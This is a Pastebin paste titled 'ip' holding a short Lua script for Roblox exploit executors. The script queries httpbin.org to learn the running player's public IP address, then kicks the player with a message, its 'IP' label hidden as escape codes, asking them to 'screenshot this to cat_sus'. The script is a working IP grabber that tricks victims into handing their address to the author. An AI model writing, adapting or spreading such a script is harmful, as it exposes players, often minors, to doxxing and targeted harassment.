Advertisement
CAT_SUS

ip

Dec 7th, 2023
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1.  
  2. local httpRequest = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request;
  3.  
  4. local body = httpRequest({
  5. Url = 'https://httpbin.org/get',
  6. Method = 'GET'
  7. })
  8.  
  9. local v1 = game:GetService('HttpService'):JSONDecode(body.Body)
  10.  
  11. game.Players.LocalPlayer:Kick("screenshot this to cat_sus | \73\80: "..tostring(v1['origin']))
  12.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement